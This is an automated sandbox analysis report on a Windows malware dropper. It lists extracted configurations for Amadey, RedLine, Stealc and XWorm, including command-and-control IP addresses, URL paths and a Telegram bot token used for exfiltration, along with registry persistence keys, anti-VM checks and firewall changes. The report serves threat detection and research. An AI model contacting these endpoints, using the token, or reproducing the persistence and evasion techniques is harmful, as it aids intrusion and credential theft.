Analysis
-
max time kernel
100s -
max time network
156s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-04-2024 15:51
Static task
static1
Behavioral task
behavioral1
Sample
d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe
Resource
win10v2004-20240419-en
Behavioral task
behavioral2
Sample
d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe
Resource
win11-20240426-en
General
-
Target
d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe
-
Size
1.8MB
-
MD5
25d59b166400d30f6da06e06475bade9
-
SHA1
e97e8af73c35544c5f4617fd707bfcbadb35ff7e
-
SHA256
d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b
-
SHA512
c09ded60888f68798999638e16f940791550ce7218f5e1b1b7e86ac4b6d1e4746c46a19556f6ce8aa933ec54744f687c0cdff7c8db7a1166923048424ee265b7
-
SSDEEP
24576:k5bZoqIKHH7rxtoblP4FUfox73SueU1CJyXswAkOnNAj6r10ydR6CXaRec+EPcyC:PE7rxaRroxlPcwaXnGyLL6te8v1bo5/
Malware Config
Extracted
amadey
4.17
http://193.233.132.167
-
install_dir
4d0ab15804
-
install_file
chrosha.exe
-
strings_key
1a9519d7b465e1f4880fa09a6162d768
-
url_paths
/enigma/index.php
Extracted
redline
@CLOUDYTTEAM
185.172.128.33:8970
Extracted
redline
Test1234
185.215.113.67:26260
Extracted
stealc
http://52.143.157.84
http://185.172.128.150
-
url_path
/c73eed764cc59dcb.php
Extracted
xworm
5.0
127.0.0.1:7000
91.92.252.220:7000
41.199.23.195:7000
saveclinetsforme68465454711991.publicvm.com:7000
bBT8anvIxhxDFmkf
-
Install_directory
%AppData%
-
install_file
explorer.exe
-
telegram
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe family_xworm behavioral2/memory/1736-283-0x00000000007F0000-0x0000000000802000-memory.dmp family_xworm -
Detect ZGRat V1 3 IoCs
Processes:
resource yara_rule behavioral2/memory/4544-75-0x0000000000400000-0x0000000000592000-memory.dmp family_zgrat_v1 C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe family_zgrat_v1 behavioral2/memory/3084-101-0x0000000000450000-0x0000000000510000-memory.dmp family_zgrat_v1 -
Glupteba payload 7 IoCs
Processes:
resource yara_rule behavioral2/memory/3324-702-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral2/memory/3480-701-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral2/memory/4944-831-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral2/memory/680-830-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral2/memory/1604-881-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral2/memory/1604-1030-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba behavioral2/memory/1604-1071-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba -
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
vqWRXwiYTAOQ7LQpPAXyXrKb.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" vqWRXwiYTAOQ7LQpPAXyXrKb.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe family_redline C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe family_redline behavioral2/memory/3236-97-0x0000000000850000-0x00000000008A2000-memory.dmp family_redline behavioral2/memory/3084-101-0x0000000000450000-0x0000000000510000-memory.dmp family_redline C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe family_redline behavioral2/memory/1984-179-0x0000000000040000-0x0000000000092000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
Processes:
d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exechrosha.exevqWRXwiYTAOQ7LQpPAXyXrKb.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ chrosha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ vqWRXwiYTAOQ7LQpPAXyXrKb.exe -
Blocklisted process makes network request 5 IoCs
Processes:
rundll32.exePIGAHxGe2PbxS5e6f1KRsKtL.exerundll32.exeflow pid process 33 1240 rundll32.exe 50 3472 PIGAHxGe2PbxS5e6f1KRsKtL.exe 51 3472 PIGAHxGe2PbxS5e6f1KRsKtL.exe 52 3472 PIGAHxGe2PbxS5e6f1KRsKtL.exe 58 3044 rundll32.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 3936 netsh.exe 2244 netsh.exe -
Checks BIOS information in registry 2 TTPs 7 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exed540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exechrosha.exevqWRXwiYTAOQ7LQpPAXyXrKb.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion chrosha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion chrosha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion vqWRXwiYTAOQ7LQpPAXyXrKb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion vqWRXwiYTAOQ7LQpPAXyXrKb.exe -
Executes dropped EXE 31 IoCs
Processes:
chrosha.exeswiiiii.exealexxxxxxxx.exetrf.exekeks.exegold.exeNewB.exejok.exeswiiii.exefile300un.exemstc.exePIGAHxGe2PbxS5e6f1KRsKtL.exec60PHerJOpPIJ0qXm2jrdNh4.exe4odFPgou1NdrXX1AEvintttJ.exeu2og.0.exerun.exeu2og.3.exevqWRXwiYTAOQ7LQpPAXyXrKb.exec60PHerJOpPIJ0qXm2jrdNh4.exe4odFPgou1NdrXX1AEvintttJ.execsrss.exeinjector.exeNNCOsc0vdMxEbZzlFP8211Wx.exeInstall.exewindefender.exe36y0Ywm7mT9F0RMTmnGvTs2k.exewindefender.exe36y0Ywm7mT9F0RMTmnGvTs2k.exe36y0Ywm7mT9F0RMTmnGvTs2k.exe36y0Ywm7mT9F0RMTmnGvTs2k.exe36y0Ywm7mT9F0RMTmnGvTs2k.exepid process 2068 chrosha.exe 1856 swiiiii.exe 1568 alexxxxxxxx.exe 3084 trf.exe 3236 keks.exe 1832 gold.exe 2096 NewB.exe 1984 jok.exe 3408 swiiii.exe 4560 file300un.exe 1736 mstc.exe 3472 PIGAHxGe2PbxS5e6f1KRsKtL.exe 3480 c60PHerJOpPIJ0qXm2jrdNh4.exe 3324 4odFPgou1NdrXX1AEvintttJ.exe 1436 u2og.0.exe 1240 run.exe 1572 u2og.3.exe 3896 vqWRXwiYTAOQ7LQpPAXyXrKb.exe 680 c60PHerJOpPIJ0qXm2jrdNh4.exe 4944 4odFPgou1NdrXX1AEvintttJ.exe 1604 csrss.exe 3820 injector.exe 3472 NNCOsc0vdMxEbZzlFP8211Wx.exe 244 Install.exe 2736 windefender.exe 4648 36y0Ywm7mT9F0RMTmnGvTs2k.exe 1672 windefender.exe 4664 36y0Ywm7mT9F0RMTmnGvTs2k.exe 3444 36y0Ywm7mT9F0RMTmnGvTs2k.exe 228 36y0Ywm7mT9F0RMTmnGvTs2k.exe 4772 36y0Ywm7mT9F0RMTmnGvTs2k.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exechrosha.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe Key opened \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine chrosha.exe -
Loads dropped DLL 9 IoCs
Processes:
rundll32.exerundll32.exerun.exerundll32.exe36y0Ywm7mT9F0RMTmnGvTs2k.exe36y0Ywm7mT9F0RMTmnGvTs2k.exe36y0Ywm7mT9F0RMTmnGvTs2k.exe36y0Ywm7mT9F0RMTmnGvTs2k.exe36y0Ywm7mT9F0RMTmnGvTs2k.exepid process 4740 rundll32.exe 1240 rundll32.exe 1240 run.exe 3044 rundll32.exe 4648 36y0Ywm7mT9F0RMTmnGvTs2k.exe 4664 36y0Ywm7mT9F0RMTmnGvTs2k.exe 3444 36y0Ywm7mT9F0RMTmnGvTs2k.exe 228 36y0Ywm7mT9F0RMTmnGvTs2k.exe 4772 36y0Ywm7mT9F0RMTmnGvTs2k.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\vqWRXwiYTAOQ7LQpPAXyXrKb.exe themida behavioral2/memory/3896-618-0x0000000140000000-0x0000000140749000-memory.dmp themida behavioral2/memory/3896-829-0x0000000140000000-0x0000000140749000-memory.dmp themida -
Processes:
resource yara_rule behavioral2/memory/1672-1046-0x0000000000400000-0x00000000008DF000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
mstc.exe4odFPgou1NdrXX1AEvintttJ.exec60PHerJOpPIJ0qXm2jrdNh4.execsrss.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" mstc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 4odFPgou1NdrXX1AEvintttJ.exe Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" c60PHerJOpPIJ0qXm2jrdNh4.exe Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
vqWRXwiYTAOQ7LQpPAXyXrKb.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA vqWRXwiYTAOQ7LQpPAXyXrKb.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
36y0Ywm7mT9F0RMTmnGvTs2k.exe36y0Ywm7mT9F0RMTmnGvTs2k.exedescription ioc process File opened (read-only) \??\D: 36y0Ywm7mT9F0RMTmnGvTs2k.exe File opened (read-only) \??\F: 36y0Ywm7mT9F0RMTmnGvTs2k.exe File opened (read-only) \??\D: 36y0Ywm7mT9F0RMTmnGvTs2k.exe File opened (read-only) \??\F: 36y0Ywm7mT9F0RMTmnGvTs2k.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 2 ipinfo.io 9 ip-api.com 9 api.myip.com 56 api.myip.com 61 ipinfo.io -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
Processes:
csrss.exedescription ioc process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 14 IoCs
Processes:
vqWRXwiYTAOQ7LQpPAXyXrKb.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy vqWRXwiYTAOQ7LQpPAXyXrKb.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol vqWRXwiYTAOQ7LQpPAXyXrKb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI vqWRXwiYTAOQ7LQpPAXyXrKb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini vqWRXwiYTAOQ7LQpPAXyXrKb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exechrosha.exevqWRXwiYTAOQ7LQpPAXyXrKb.exepid process 3312 d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe 2068 chrosha.exe 3896 vqWRXwiYTAOQ7LQpPAXyXrKb.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
swiiiii.exealexxxxxxxx.exegold.exeswiiii.exefile300un.exerun.execmd.exedescription pid process target process PID 1856 set thread context of 1716 1856 swiiiii.exe RegAsm.exe PID 1568 set thread context of 4544 1568 alexxxxxxxx.exe RegAsm.exe PID 1832 set thread context of 2632 1832 gold.exe RegAsm.exe PID 3408 set thread context of 3768 3408 swiiii.exe RegAsm.exe PID 4560 set thread context of 4704 4560 file300un.exe installutil.exe PID 1240 set thread context of 396 1240 run.exe cmd.exe PID 396 set thread context of 4024 396 cmd.exe MSBuild.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
c60PHerJOpPIJ0qXm2jrdNh4.exe4odFPgou1NdrXX1AEvintttJ.exedescription ioc process File opened (read-only) \??\VBoxMiniRdrDN c60PHerJOpPIJ0qXm2jrdNh4.exe File opened (read-only) \??\VBoxMiniRdrDN 4odFPgou1NdrXX1AEvintttJ.exe -
Drops file in Windows directory 7 IoCs
Processes:
d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe4odFPgou1NdrXX1AEvintttJ.exec60PHerJOpPIJ0qXm2jrdNh4.execsrss.exedescription ioc process File created C:\Windows\Tasks\chrosha.job d540648ed702517b8e4f268605a27941fe63aa4535854e6b7e89f24f60140e9b.exe File opened for modification C:\Windows\rss 4odFPgou1NdrXX1AEvintttJ.exe File created C:\Windows\rss\csrss.exe 4odFPgou1NdrXX1AEvintttJ.exe File opened for modification C:\Windows\rss c60PHerJOpPIJ0qXm2jrdNh4.exe File created C:\Windows\rss\csrss.exe c60PHerJOpPIJ0qXm2jrdNh4.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid process 1352 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3872 1856 WerFault.exe swiiiii.exe 4024 1568 WerFault.exe alexxxxxxxx.exe 4324 1832 WerFault.exe gold.exe 4080 3472 WerFault.exe PIGAHxGe2PbxS5e6f1KRsKtL.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
u2og.3.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2og.3.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2og.3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2og.3.exe -
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5832 schtasks.exe 2876 schtasks.exe 4456 schtasks.exe 4664 schtasks.exe 72 schtasks.exe 3100 schtasks.exe 5660 schtasks.exe 5920 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe4odFPgou1NdrXX1AEvintttJ.exepowershell.exepowershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" 4odFPgou1NdrXX1AEvintttJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" 4odFPgou1NdrXX1AEvintttJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" 4odFPgou1NdrXX1AEvintttJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" 4odFPgou1NdrXX1AEvintttJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" 4odFPgou1NdrXX1AEvintttJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" 4odFPgou1NdrXX1AEvintttJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" 4odFPgou1NdrXX1AEvintttJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" 4odFPgou1NdrXX1AEvintttJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" 4odFPgou1NdrXX1AEvintttJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" 4odFPgou1NdrXX1AEvintttJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" 4odFPgou1NdrXX1AEvintttJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" 4odFPgou1NdrXX1AEvintttJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" 4odFPgou1NdrXX1AEvintttJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" 4odFPgou1NdrXX1AEvintttJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" 4odFPgou1NdrXX1AEvintttJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" 4odFPgou1NdrXX1AEvintttJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time" 4odFPgou1NdrXX1AEvintttJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" 4odFPgou1NdrXX1AEvintttJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" 4odFPgou1NdrXX1AEvintttJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" 4odFPgou1NdrXX1AEvintttJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" 4odFPgou1NdrXX1AEvintttJ.exe -
Processes:
keks.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 keks.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 